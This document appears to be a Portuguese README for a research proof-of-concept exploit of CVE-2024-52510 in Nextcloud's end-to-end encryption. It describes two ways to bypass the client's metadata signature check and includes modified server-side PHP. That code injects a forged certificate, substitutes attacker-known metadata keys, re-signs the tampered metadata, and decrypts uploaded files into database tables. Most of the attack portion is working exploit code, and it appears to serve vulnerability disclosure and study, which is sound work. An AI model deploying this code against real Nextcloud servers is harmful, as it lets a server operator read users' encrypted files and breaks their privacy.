
Prova de conceito de exploit para CVE-2024-52510 demonstrando bypass de assinatura no protocolo E2EEv2 do Nextcloud, permitindo descriptografia no lado do servidor de arquivos criptografados via injeção de chave de metadados.
Durante a operação normal do protocolo E2EEv2 do Nextcloud, os clientes assinam criptograficamente os metadados da pasta antes de enviá-los ao servidor. Isso garante que os metadados não tenham sido adulterados quando são recuperados novamente para fins de compartilhamento de arquivos ou sincronização de alterações.
A verificação da assinatura é realizada pelo cliente em
foldermetadata.cpp:177
quando os metadados obtidos são inicializados. No entanto, existem duas maneiras pelas quais um servidor malicioso pode contornar essa verificação:
Eles podem responder com um cabeçalho de resposta X-E2EE-SIGNATURE vazio. Como o
cabeçalho está vazio, a condição em
foldermetadata.cpp:168
significa que a verificação da assinatura não ocorre, e os metadados alterados
são aceitos pelo cliente.
Eles podem injetar um certificado no array JSON users e, em seguida, assinar
os metadados com esse certificado. Como CMS_NO_SIGNER_CERT_VERIFY é
passado em
clientsideencryption.cpp:941,
o certificado de assinatura não é verificado em cadeia e o cliente apenas verifica
se o certificado de assinatura está presente no vetor certificatePems
(clientsideencryption.cpp:955-971)
que é controlado pelo servidor.
Nesta POC demonstraremos o último método, pois é o método mais difícil de implementar, no entanto, ambos foram testados e funcionam.
Um servidor malicioso pode usar esse bypass para fornecer aos clientes chaves de metadados conhecidas pelo servidor. Os clientes usarão então essa chave de metadados para criptografar arquivos subsequentes, permitindo que o servidor descriptografe e leia arquivos em pastas criptografadas de ponta a ponta.
Essa forma de explorar o bypass de assinatura é baseada em um ataque encontrado por Albrecht, Backendal, Coppola, Paterson em 2023 (https://eprint.iacr.org/2024/546) em uma versão anterior do protocolo E2EE. De fato, a autenticação das chaves de metadados foi uma estratégia de mitigação para o ataque (veja a seção 5.1 do artigo vinculado).
Clone este repositório e abra no VS Code usando a extensão DevContainer. Um DevContainer baseado no do repositório do servidor Nextcloud foi fornecido com as seguintes alterações:
mitmproxy está presente na porta 7001. A interface web pode ser acessada na porta 7002.encryption e end_to_end_encryption também serão ativados, e uma conta com nome de usuário e senha sharer será criada.Assim que o servidor estiver ativo, conecte-se a ele em http://localhost:8000 (ou através do proxy reverso em http://localhost:7001) usando o cliente mais recente. Atualmente, testei isso no AppImage v3.13.2.
sha256sum Nextcloud-3.13.2-x86_64.AppImage
92ec0a5260f6260fa8ce92acdb022c441f0efbf6b57cc96d75ac608ccb4c4ee2 Nextcloud-3.13.2-x86_64.AppImage
Quando solicitado, faça login com o nome de usuário sharer e senha sharer. Aceite as opções de sincronização padrão (criando um diretório ~/Nextcloud/ com welcome.txt dentro dele) e configure a criptografia de ponta a ponta nas configurações do cliente Nextcloud.
Crie uma nova pasta encrypted_folder dentro do diretório ~/Nextcloud. Nas configurações do cliente Nextcloud, marque esta pasta como criptografada.

Nextcloud/encrypted_folder, crie um arquivo de texto simples e aguarde a sincronização.# ~/Nextcloud/encrypted_folder
$ echo 'this should be encrypted' > file.txt
Faça login no banco de dados Postgres no Adminer em http://localhost:8080/ usando as credenciais:
postgrespostgrespostgrese navegue até as tabelas oc_e2e_encryption_metadata e oc_e2e_encryption_decrypted. Você deve conseguir ver os metadados descriptografados e o conteúdo do arquivo em texto claro.

As capturas de tela acima tinham alguns arquivos de teste extras criados e excluídos, portanto, serão um pouco diferentes do que você vê
Este repositório é baseado nos repositórios Nextcloud server e aplicativo de criptografia ponta a ponta. A maior parte do código permanece inalterada, então tentarei dar uma explicação do que foi alterado.
Primeiramente, o método getMetadata de MetaDataStorage.php foi alterado para
adulterar os metadados retornados ao chamar um novo método getFakeUserMetadata.
--- original/lib/MetaDataStorage.php 2024-07-11 23:38:16.105826088 +1000
+++ nc-server/apps/end_to_end_encryption/lib/MetaDataStorage.php 2024-07-11 21:05:37.734565037 +1000
@@ -68,14 +82,12 @@
return $legacyFile->getContent();
}
- $folderName = $this->getFolderNameForFileId($id);
- $folder = $this->appData->getFolder($folderName);
+ $metaData = $this->getFakeUserMetadata($id);
- return $folder
- ->getFile($this->metaDataFileName)
- ->getContent();
+ return $metaData;
}
No método getFakeUserMetadata, primeiro injetamos um certificado escolhido na
chave JSON users. Isso é para facilitar a falsificação de assinatura.
private function getFakeUserMetadata(int $id): string {
$folderName = $this->getFolderNameForFileId($id);
$folder = $this->appData->getFolder($folderName);
$metaData = json_decode($folder->getFile($this->metaDataFileName)->getContent());
if (is_null($metaData->users)) {
/* This is a non-root metadata. Return as normal*/
return json_encode($metaData);
}
/*
* Step 1: Inject a fake public key into the metadata
* This can be used to forge a signature for the response.
*/
$found = false;
foreach ($metaData->users as $userData) {
if ($userData->userId === $this->fakeUserId) {
$found = true;
break;
}
}
if (!$found) {
try {
$certificateFile = $folder->getFile($this->fakeUserPublicCertificateFileName);
$privateKeyFile = $folder->getFile($this->fakeUserPrivateKeyFileName);
$pemCertificate = $certificateFile->getContent();
} catch (NotFoundException $e) {
/* Create a new private key for the fake user */
$privateKey = openssl_pkey_new();
openssl_pkey_export($privateKey, $privateKeyPem);
$folder->newFile($this->fakeUserPrivateKeyFileName)->putContent($privateKeyPem);
/* Client is expecting a certificate for the public key */
$csr = openssl_csr_new(array(), $privateKey);
$certificate = openssl_csr_sign($csr, null, $privateKey, 365);
openssl_x509_export($certificate, $pemCertificate);
$folder->newFile($this->fakeUserPublicCertificateFileName)->putContent($pemCertificate);
}
$newUser = new \stdClass();
$newUser->certificate = $pemCertificate;
array_push($metaData->users, $newUser);
}
Então, como temos acesso à chave pública do cliente, podemos criptografar nossas próprias chaves e substituir as chaves de metadados criptografadas por chaves que controlamos.
/*
* Step 2: Change all the metadata keys to keys that we control.
*/
foreach ($metaData->users as $userData) {
$publicKey = PublicKeyLoader::load($userData->certificate)->withHash('sha256')->withMGFHash('sha256');
$fakeEncryptedMetadataKey = $publicKey->encrypt($this->fakeMetadataKey);
$userData->encryptedMetadataKey = base64_encode($fakeEncryptedMetadataKey);
}
/* We need to set userId after setting encryptedMetadataKey, as Qt will serialize json keys in alphabetical order */
if (!is_null($newUser)) {
$newUser->userId = $this->fakeUserId;
}
Como adulteramos as chaves de metadados, também precisaremos alterar o texto cifrado. Se já executamos o ataque com sucesso, teremos acesso a metadados reais que podemos re-criptografar. Caso contrário, inicializaremos um objeto de metadados vazio e criptografaremos isso.
/*
* Step 3: Replace the encrypted metadata with one that can be decrypted under the new key.
* Then as long as we don't trigger a downsync, the next PUT will
* contain metadata encrypted with a key known to us.
*/
$fakeMetadata = new \stdClass();
$fakeMetadata->folders = new \stdClass();
$fakeMetadata->files = new \stdClass();
try {
$metadataEntities = $this->metadataMapper->getByFolderId($id);
foreach ($metadataEntities as $metadataEntity) {
$encryptedFilename = $metadataEntity->getEncryptedFilename();
if ($metadataEntity->isDirectory()) {
$fakeMetadata->folders->$encryptedFilename = $metadataEntity->toJson();
} else {
$fakeMetadata->files->$encryptedFilename = $metadataEntity->toJson();
}
}
} catch (DoesNotExistException $ex) {
/* Return empty metadata */
}
$fakeMetadata->counter = $this->getCounter($id);
/* keyChecksums needs to contain the SHA256 of the decrypted metadata key (in hex) */
$fakeMetadata->keyChecksums = array();
array_push($fakeMetadata->keyChecksums, hash("sha256", $this->fakeMetadataKey));
/* Then the AES-128-GCM ciphertext of the gzipped json object goes into the response */
$plaintext = gzencode(json_encode($fakeMetadata));
$nonce = openssl_random_pseudo_bytes(16);
$ciphertext = openssl_encrypt($plaintext, "aes-128-gcm", $this->fakeMetadataKey, OPENSSL_RAW_DATA, $nonce, $authenticationTag);
$metaData->metadata->authenticationTag = base64_encode($authenticationTag);
$metaData->metadata->ciphertext = base64_encode($ciphertext . $authenticationTag) . "|" . base64_encode($nonce);
$metaData->metadata->nonce = base64_encode($nonce);
$metaData = json_encode($metaData, JSON_UNESCAPED_SLASHES);
/* Ensure whatever metadata we return syncs up with what is stored on disk */
$folder->getFile($this->metaDataFileName)->putContent($metaData);
Finalmente, pegamos o payload JSON adulterado e o assinamos novamente com nosso certificado. Uma alternativa também seria usar uma assinatura vazia aqui.
/* Note: We only need to forge a signature for root metadata */
$certificateFile = $folder->getFile($this->fakeUserPublicCertificateFileName);
$privateKeyFile = $folder->getFile($this->fakeUserPrivateKeyFileName);
$pemCertificate = $certificateFile->getContent();
$privateKey = openssl_pkey_get_private($privateKeyFile->getContent());
$signatureTempFile = tempnam(sys_get_temp_dir(), "signature");
$metadataTempFile = tempnam(sys_get_Temp_dir(), "metadata");
file_put_contents($metadataTempFile, base64_encode($metaData));
if (openssl_cms_sign($metadataTempFile, $signatureTempFile, $pemCertificate, $privateKey, array(), 0, OPENSSL_ENCODING_DER)) {
$signature = base64_encode(file_get_contents($signatureTempFile));
$this->writeSignature($folder, $this->metaDataSignatureFileName, $signature);
} else {
$this->writeSignature($folder, $this->metaDataSignatureFileName, "");
}
unlink($signatureTempFile);
unlink($metadataTempFile);
return $metaData;
}
Uma vez que os metadados foram adulterados, o cliente usará nossa chave de criptografia para criptografar quaisquer novos metadados. Ao receber quaisquer novos metadados, tentamos descriptografá-los usando nossa chave.
--- original/lib/Controller/MetaDataController.php 2024-07-11 23:38:16.102492800 +1000
+++ nc-server/apps/end_to_end_encryption/lib/Controller/MetaDataController.php 2024-07-11 20:54:06.794689137 +1000
@@ -164,9 +170,11 @@
}
if ($this->lockManager->isLocked($id, $e2eToken, null, true)) {
throw new OCSForbiddenException($this->l10n->t('You are not allowed to edit the file, make sure to first lock it, and then send the right token'));
}
+ $this->metaDataStorage->decryptMetaData($id, $metaData);
+
try {
$this->metaDataStorage->updateMetaDataIntoIntermediateFile($this->userId, $id, $metaData, $e2eToken, $signature);
} catch (MissingMetaDataException $e) {
public function decryptMetaData(int $id, string $metaData) {
$this->verifyFolderStructure();
$folderName = $this->getFolderNameForFileId($id);
$folder = $this->appData->getFolder($folderName);
/* Try to decrypt the incoming metadata with our fake key */
$metaData = json_decode($metaData);
$authenticationTag = base64_decode($metaData->metadata->authenticationTag);
$ciphertextAndTag = base64_decode(explode("|", $metaData->metadata->ciphertext)[0]);
$ciphertext = substr($ciphertextAndTag, 0, -16);
$nonce = base64_decode($metaData->metadata->nonce);
$gzippedPlaintext = openssl_decrypt($ciphertext, "aes-128-gcm", $this->fakeMetadataKey, OPENSSL_RAW_DATA, $nonce, $authenticationTag);
/* If we succeed, store the decrypted metadata */
if ($gzippedPlaintext) {
$decodedMetadata = json_decode(gzdecode($gzippedPlaintext));
foreach ($decodedMetadata->files as $encryptedFilename => $file) {
try {
$metadataEntity = $this->metadataMapper->getByFolderIdAndEncryptedFilename($id, $encryptedFilename);
$metadataEntity->setEncryptedFilename($encryptedFilename);
$metadataEntity->setKey($file->key);
$metadataEntity->setKey($file->key);
$metadataEntity->setNonce($file->nonce);
$metadataEntity->setAuthenticationTag($file->authenticationTag);
$metadataEntity->setFilename($file->filename);
$this->metadataMapper->update($metadataEntity);
} catch (DoesNotExistException $ex) {
$newMetadata = new Metadata();
$newMetadata->setFolderId($id);
$newMetadata->setEncryptedFilename($encryptedFilename);
$newMetadata->setKey($file->key);
$newMetadata->setNonce($file->nonce);
$newMetadata->setAuthenticationTag($file->authenticationTag);
$newMetadata->setFilename($file->filename);
$this->metadataMapper->insert($newMetadata);
}
}
foreach ($decodedMetadata->folders as $encryptedFilename => $filename) {
try {
$metadataEntity = $this->metadataMapper->getByFolderIdAndEncryptedFilename($id, $encryptedFilename);
$metadataEntity->setFilename($filename);
$this->metadataMapper->update($metadataEntity);
} catch (DoesNotExistException $ex) {
$newMetadata = new Metadata();
$newMetadata->setFolderId($id);
$newMetadata->setEncryptedFilename($encryptedFilename);
$newMetadata->setFilename($filename);
$this->metadataMapper->insert($newMetadata);
}
}
}
}
Finalmente, criamos um ouvinte para quando o novo arquivo é criado e tentamos descriptografar usando as chaves de arquivo encontradas nos metadados descriptografados.
class NodeCreatedListener implements IEventListener {
private MetadataMapper $metadataMapper;
private PlaintextMapper $plaintextMapper;
public function __construct(MetadataMapper $metadataMapper, PlaintextMapper $plaintextMapper) {
$this->metadataMapper = $metadataMapper;
$this->plaintextMapper = $plaintextMapper;
}
public function handle(Event $event): void {
if (!($event instanceof NodeCreatedEvent)) {
return;
}
$node = $event->getNode();
$encryptedFilename = preg_replace('/\.e2e-to-save$/', '', $node->getName());
if ($node instanceof File) {
$curr = $node;
while (!($curr instanceof Root)) {
$curr = $curr->getParent();
$id = $curr->getId();
try {
$metadata = $this->metadataMapper->getByFolderIdAndEncryptedFilename($id, $encryptedFilename);
} catch (DoesNotExistException $ex) {
continue;
}
/* Metadata found: try to decrypt */
$key = base64_decode($metadata->getKey());
$nonce = base64_decode($metadata->getNonce());
$authenticationTag = base64_decode($metadata->getAuthenticationTag());
$ciphertext = substr($node->getContent(), 0, -16);
$plaintext = openssl_decrypt($ciphertext, "aes-128-gcm", $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $nonce, $authenticationTag);
if ($plaintext) {
/* Decryption successful. Store in DB */
try {
$plaintextEntity = $this->plaintextMapper->getById($metadata->getId());
$plaintextEntity->setPlaintext($plaintext);
$this->plaintextMapper->update($plaintextEntity);
} catch (DoesNotExistException $ex) {
$plaintextEntity = new Plaintext();
$plaintextEntity->setId($metadata->getId());
$plaintextEntity->setPlaintext($plaintext);
$this->plaintextMapper->insert($plaintextEntity);
}
break;
}
}
}
}
}